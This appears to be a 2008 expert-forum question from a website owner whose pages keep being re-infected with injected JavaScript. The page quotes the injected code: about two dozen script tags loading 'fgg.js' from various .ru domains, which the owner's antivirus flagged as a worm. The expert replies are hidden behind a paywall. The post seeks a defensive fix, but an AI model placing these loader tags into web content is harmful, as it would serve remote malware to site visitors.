Advertisement

07.23.2008 at 01:41PM PDT, ID: 23590128
[x]
Attachment Details

Malware on my webserver:

Asked by adammatthews1 in Anti-Virus, Networking Security Vulnerabilities

Tags:

I had a malware problem on www.avalonme.com last week.  My webmaster deleted all files and uploaded backup files.  We also changed the password.  Java script (see below) is still being injected into the files causing errors when I view pages in my Explorer browser and Google is showing some of the pages as "attack" sites.  

My webmaster is deleting and reloading backup.  This time he will make the public folder non-writeable.   I use PC Security Shield anti-virus software and one of the events it shows reads:  "7/17/2008 9:34:05 AM      Malicious HTTP object <http://www.gbradw.com/fgg.js>: detected virus 'Net-Worm.JS.Aspxor.a'."  The code being injected can be viewed in the attached "Code Snippet"   Any other suggestions to prevent whatever is injecting the javascript?Start Free Trial 
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:

<script src=http://www.lodse.ru/fgg.js></script><script
src=http://www.h23f.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.4cnw.ru/fgg.js></script><script
src=http://www.adwr.ru/fgg.js></script><script
src=http://www.gb53.ru/fgg.js></script><script
src=http://www.h23f.ru/fgg.js></script><script
src=http://www.vcre.ru/fgg.js></script><script
src=http://www.rrcs.ru/fgg.js></script><script
src=http://www.5kc3.ru/fgg.js></script><script
src=http://www.kc43.ru/fgg.js></script><script
src=http://www.kc43.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.sslwer.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.adwr.ru/fgg.js></script><script
src=http://www.keje.ru/fgg.js></script><script
src=http://www.lkc2.ru/fgg.js></script><script
src=http://www.bnrc.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.kc43.ru/fgg.js></script><script
src=http://www.lkc2.ru/fgg.js></script><script
src=http://www.sdkj.ru/fgg.js></script><script
src=http://www.jex5.ru/fgg.js></script>
[+][-]07.23.2008 at 07:46PM PDT, ID: 22075753

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]07.24.2008 at 02:44PM PDT, ID: 22083842

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]07.24.2008 at 03:08PM PDT, ID: 22084055

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 7-day free trial to view this Author Comment or ask the Experts your question.

 
[+][-]07.24.2008 at 03:37PM PDT, ID: 22084271

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]07.25.2008 at 12:11PM PDT, ID: 22091423

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]07.25.2008 at 12:47PM PDT, ID: 22091711

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 7-day free trial to view this Author Comment or ask the Experts your question.

 
[+][-]07.27.2008 at 10:01PM PDT, ID: 22100765

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]07.28.2008 at 05:58AM PDT, ID: 22102597

View this solution now by starting your 7-day free trial. Setting up your free trial is quick, easy, and secure. We will return you to this solution, unlocked, when you're done.

 

About this solution

Zones: Anti-Virus, Networking Security Vulnerabilities
Tags: malware; webserver; security
Sign Up Now!
Solution Provided By: Admin3k
Participating Experts: 6
Solution Grade: B
 
 
[+][-]07.29.2008 at 10:50AM PDT, ID: 22113822

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]07.29.2008 at 11:43AM PDT, ID: 22114234

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]07.31.2008 at 09:03AM PDT, ID: 22130983

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 7-day free trial to view this Author Comment or ask the Experts your question.

 
[+][-]07.31.2008 at 09:27AM PDT, ID: 22131198

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
 
Loading Advertisement...
20080716-EE-VQP-32 / EE_QW_EXPERT_20070906